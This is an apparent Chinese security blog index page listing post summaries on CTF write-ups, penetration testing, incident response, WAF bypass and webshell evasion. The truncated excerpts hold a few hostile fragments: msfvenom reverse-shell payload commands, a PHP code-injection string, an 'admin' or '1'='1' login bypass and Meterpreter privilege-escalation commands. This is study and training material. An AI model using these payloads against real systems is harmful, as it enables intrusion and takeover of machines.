摘要: 任务一 访问服务器8080端⼝,找出ecshop版本号,将版本号作为flag提交**(数字)** 通过访问http://IP:8080 可以看到页面首页存在版本信息 访问网站,利用漏洞找到网站根目录的flag1,将flag1作为flag提交。 因为在网站根目录,直接尝试访问http://IP/fla 阅读全文
posted @ 2022-06-13 10:09 Rlins 阅读(450) 评论(0) 推荐(0)
摘要: 第二阶段 任务一 第一题: ?dcn=);show_source("flag.php");// 第二题:输入密码查看flag 密码是:13546 第三题:修改前端输入框大小 第四题:burp抓包--res模块重放 第五题:wireshark 第242包追中http流 读取flag到burp解密 任务 阅读全文
posted @ 2022-06-13 10:08 Rlins 阅读(178) 评论(0) 推荐(0)
摘要: Meterpreter Shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f exe > reverse.exe msfvenom -p windows/shell_reverse_tcp L 阅读全文
posted @ 2022-06-13 10:06 Rlins 阅读(109) 评论(0) 推荐(0)
摘要: WAF是如何被绕过的 课程简介 WAF(Web应用防火墙,Web Application Firewall的简称)是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品。WAF可以发现和拦截各类Web层面的攻击,记录攻击日志,实时预警提醒,在Web应用本身存在缺陷的情况下 阅读全文
posted @ 2022-06-13 10:05 Rlins 阅读(362) 评论(0) 推荐(1)
摘要: 编码 进制 十进制:20 八进制:024 十六进制:0x14 key和flag对应的ASCII key 107 101 121 KEY 75 69 89 flag 102 108 97 103 FLAG 70 76 65 71 Unicode 编码 例如:原文本:You had me at hell 阅读全文
posted @ 2022-06-13 10:03 Rlins 阅读(1549) 评论(0) 推荐(0)
摘要: 应急响应 宏观题 1. 思路流程 信息收集>类型判断>抑制范围>深入分析>清理处置>输出报告 收集信息:收集客户信息和中毒主机信息,包括样本 判断类型:判断是否是安全事件,何种安全事件,勒索、挖矿、断网、DoS 等等 抑制范围:隔离使受害⾯不继续扩⼤ 深入分析:日志分析、进程分析、启动项分析、样本分 阅读全文
posted @ 2022-06-13 10:03 Rlins 阅读(2028) 评论(0) 推荐(1)
摘要: 一、 基础技能&工具 常用方法 ​ 三要素:时间;地点;事件(系统、安全设备、相关应用、操作历史日志) ​ 回溯攻击法:模拟攻击 ​ 经验法:常用目录(tmp; /var/tmp: dev/shm; RECYCLER);惯用手法(常见一句话木马;常见后门);常见恶意程序特征 日志 ​ 主机:应用程序 阅读全文
posted @ 2022-06-13 09:58 Rlins 阅读(201) 评论(0) 推荐(0)
摘要: 记一次从web到内网的渗透 拓扑图 环境介绍 现在有三台机器,分别为target1,target2,target3,里面分别有三个flag,每个flag的分值不同,需要通过拿下一个已知IP(target1)进而向内网里面进行渗透,最终要成功获得三台主机权限 渗透过程 target1 使用nmap进行 阅读全文
posted @ 2022-06-13 09:57 Rlins 阅读(444) 评论(0) 推荐(0)
摘要: MISC 1. Utf-7解密 win7中utf-7工具解密 2. Wireshark分析 筛选http请求包,追踪流 3. wireshark文件导出 导出对象>>>http 4. png文件头补全 winhex打开文件,修改文件头89504E47为png文件头,打开图片得flag 504E47 阅读全文
posted @ 2022-06-13 09:56 Rlins 阅读(248) 评论(3) 推荐(0)
摘要: 一、ew正向代理 0x01 ew介绍 该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 下载地址: https://github.com/idlefire/ew 0x02 使用方法 服务端(vps): -l 本地监听端口, 阅读全文
posted @ 2022-06-13 09:56 Rlins 阅读(1030) 评论(0) 推荐(0)
摘要: 第一题 打开页面发现http://10.196.8.21:18083/calculate/ 利用python的requests库做计算, import re import requests import time url = 'http://10.196.8.21:18083/calculate/' 阅读全文
posted @ 2022-06-13 09:51 Rlins 阅读(512) 评论(0) 推荐(0)
摘要: 一、 基础知识篇 1.1 linux基础 内核接口 x86-32 系统调用约定:Linux 系统调用使用寄存器传递参数。eax 为 syscall_number,ebx、ecx、edx、esi、ebp用于将 6 个参数传递给系统调用。返回值保存在 eax 中。所有其他寄存器(包括 EFLAGS)都保 阅读全文
posted @ 2022-06-13 09:50 Rlins 阅读(691) 评论(2) 推荐(0)
摘要: 代码执行函数绕过 eval、assert、system、passthru 正则 preg_replace ($pattern , $replacement , $subject ) ​ $pattern为正则表达式 ​ $replacement为替换字符串 ​ $subject 为要搜索替换的目标字 阅读全文
posted @ 2022-06-13 09:49 Rlins 阅读(1004) 评论(0) 推荐(0)
摘要: php伪协议 相关知识 文件读取相关函数 include require include_once require_once highlight_file show_source readfile file_get_contents fopen file file://协议 allow_url_fo 阅读全文
posted @ 2022-06-13 09:49 Rlins 阅读(65) 评论(0) 推荐(0)
摘要: Meterpreter Shell命令 getsystem #会自动利用各种各样的系统漏洞来进行权限提升; migrate #进程id进程迁移; getuid #查看对方正在运行的用户; ps #列出所有的进程; getpid #返回运行meterpreter的id号; sysinfo #产看系统信 阅读全文
posted @ 2022-06-13 09:48 Rlins 阅读(380) 评论(0) 推荐(0)
摘要: 常见的应急响应事件分类: web入侵:网页挂马、主页篡改、Webshell 系统入侵:病毒木马、勒索软件、远控后门 网络攻击:DDOS攻击、DNS劫持、ARP欺骗 入侵排查思路 web入侵:对中间价日志进行分析 系统入侵:计划任务,系统爆破痕迹(系统日志),进程进行分析 网络攻击:流量分析 1、 检 阅读全文
posted @ 2022-06-13 09:48 Rlins 阅读(335) 评论(0) 推荐(0)
摘要: Phpinfo页面利用 system 获取具体版本,可以用来提权 extension_dir php扩展的路径,图省事没用lamp包有点捞…(这里还是说下linux不推荐用phpstudy,很多linux装了phpstudy系统会崩) http_x_real_ip 直接获取真实ip,无视代理、cdn 阅读全文
posted @ 2022-06-13 09:47 Rlins 阅读(315) 评论(0) 推荐(0)
摘要: 一、了解sql注入 sql注入 ​ SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 阅读全文
posted @ 2022-06-13 09:47 Rlins 阅读(950) 评论(0) 推荐(0)
摘要: title: 记录对permate漏洞挖掘 categories: ctf 1.反射型xss 搜索框尝试xss语句,发现存在反射型xss 2.SQL注入 存在sql注入 --+注释,发现存在11个字段 http://10.196.8.31/home/index.php?m=tiezi&a=index 阅读全文
posted @ 2022-06-13 09:46 Rlins 阅读(81) 评论(0) 推荐(0)
摘要: title: 记录对Piti's wonderful blog漏洞挖掘 categories: ctf 1.首页发现收索框,尝试xss,发现存在反射型xss漏洞 2.首页发现一个登陆框,发现万能用户登陆 admin’ or ‘1’=’1’ 3.用户登陆后看到写文章版,尝试存储型xss,过滤<scri 阅读全文
posted @ 2022-06-13 09:44 Rlins 阅读(23) 评论(0) 推荐(0)
摘要: 第一题:ASCII解码 第二题:base64 缺一半的64 不就是32 第三题:Escape 第四题:16进制 第五题:JSFUCK 第六题:quoted-printable 第七题:unicode 第八题:url 第十题:莫斯 阅读全文
posted @ 2022-06-13 09:43 Rlins 阅读(40) 评论(0) 推荐(0)
摘要: kali工具 john解密工具 john解密 用法: john [OPTIONS] [PASSWORD-FILES] john [选项] [密码文件] 选项: --single[=SECTION] ]“单裂”模式 --wordlist[=FILE] --stdin 单词表模式,从FILE或stdin 阅读全文
posted @ 2022-06-13 09:41 Rlins 阅读(95) 评论(0) 推荐(0)
摘要: 信息收集 子域名收集 基于SSL证书查询 1.censys.io 2.crt.sh 第三方网站接口 1.riskiq 2.shodan 3.fifindsubdomains 4.censys.io 5.dnsdb.io Github DNS解析 子域名枚举 资产收集 目标主业务二级域名、三级域名等… 阅读全文
posted @ 2022-06-13 09:41 Rlins 阅读(52) 评论(0) 推荐(0)
摘要: 0x00:前言 在实际的渗透测试中,Webshell真正免杀的第一步就是确保 Webshell 的源脚本免杀,其次是传输内容的编码混淆。 但仅将 request 包内容进行编码,发送到服务器是远远不够的;部分 WAF 或者信息防泄漏系统还会对网页的 response 返回包流量进行检测。这时候,无论 阅读全文
posted @ 2022-06-13 09:40 Rlins 阅读(170) 评论(0) 推荐(0)
摘要: 0x00: 前言 一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。 本篇文章主要探讨关于PHP语言的Webshell检测工具和平台的绕过方法,实现能够绕过以下表格中7个主流(基本代表安全行业内PHP Webshell检测 阅读全文
posted @ 2022-06-13 09:40 Rlins 阅读(215) 评论(0) 推荐(0)
摘要: 基于内存 Webshell 的无文件攻击技术研究 一. 情况介绍 红队人员在面对蓝队的严防死守与"盯梢"式的防御策略时,传统需要文件落地的攻击技术往往会受到掣肘,基于 Web 的无文件攻击技术逐渐成为 Web 安全的一种新的研究趋势。 所以我们重点研究了基于 Java 的常用 Web 框架 — Sp 阅读全文
posted @ 2022-06-13 09:39 Rlins 阅读(299) 评论(0) 推荐(0)
摘要: 0x00:前言 JSP后门,一般是指文件名以.jsp等后缀结尾的,可运行于Java servlet及相关容器和组件内的通用JSP脚本。 本文主要讨论利用Java反射机制和Java类加载机制构造JSP系统命令执行后门,并绕过一般软件检测的方法。 0x01:Java执行系统命令的方法和原理 要构建JSP 阅读全文
posted @ 2022-06-13 09:39 Rlins 阅读(1866) 评论(0) 推荐(1)
摘要: 0x00:前言 随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。 本篇文章主要梳理ASP一句话Webshell的构建 阅读全文
posted @ 2022-06-13 09:38 Rlins 阅读(367) 评论(0) 推荐(0)
摘要: 0x01 Redis未授权访问 1.扫描探测 (1). 测试时建议 vim /etc/redis.conf (1)cp redis.conf ./src/redis.conf (2)bind 127.0.0.1前面加上##号注释掉 或者更改成 0.0.0.0 (3)protected-mode设为n 阅读全文
posted @ 2022-06-13 09:37 Rlins 阅读(543) 评论(0) 推荐(0)
摘要: Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为 1) Target(目标): 以下至少需要设置其中一个选项,设置目标 URL。 -d DIRECT 直接连接到数据库。 -u URL, - 阅读全文
posted @ 2022-06-13 09:36 Rlins 阅读(12) 评论(0) 推荐(0)
摘要: HCTF-2018——WarmUp 打开页面F12发现 <!--source.php--> 访问这个页面,给出源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whi 阅读全文
posted @ 2022-06-13 09:36 Rlins 阅读(86) 评论(0) 推荐(0)
摘要: web26 http://123.206.31.85:10026/ 代码审计发现,传入参赛num为数字并且str为字符串就会输出flag (if语句过滤了str的十进制和空字符,is_numeric 检测输入是否为数字) http://123.206.31.85:10026/?num=1&&str= 阅读全文
posted @ 2022-06-13 09:35 Rlins 阅读(36) 评论(0) 推荐(0)
摘要: ActiveMQ 反序列化漏洞(CVE-2015-5254) Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞 阅读全文
posted @ 2022-06-13 09:34 Rlins 阅读(24) 评论(0) 推荐(0)
摘要: web扫描工具(nikto) 一、web漏洞扫描原理 web漏洞扫描是在web信息搜集的基础上,进行更进一步的安全评估、漏洞挖掘、渗透测试。 web漏洞扫描能够让我们进一步挖掘sql注入、xss跨站脚本攻击、csrf跨站请求伪造等漏洞。 web漏洞扫描虽然能够帮助我们快速的实现自动化扫描,但并不是全 阅读全文
posted @ 2022-06-13 09:33 Rlins 阅读(580) 评论(0) 推荐(0)
摘要: 题目一: $username = @clean((string)$_GET['username']); $password = @clean((string)$_GET['password']); 传参username和password对数据库做查询 $str=stripslashes($str); 阅读全文
posted @ 2022-06-13 09:32 Rlins 阅读(98) 评论(0) 推荐(0)
摘要: unicode解密 \u5927\u5bb6\u597d\uff0c\u6211\u662f\u0040\u65e0\u6240\u4e0d\u80fd\u7684\u9b42\u5927\u4eba\uff01\u8bdd\u8bf4\u5fae\u535a\u7c89\u4e1d\u8fc7\u 阅读全文
posted @ 2022-06-13 09:31 Rlins 阅读(184) 评论(0) 推荐(0)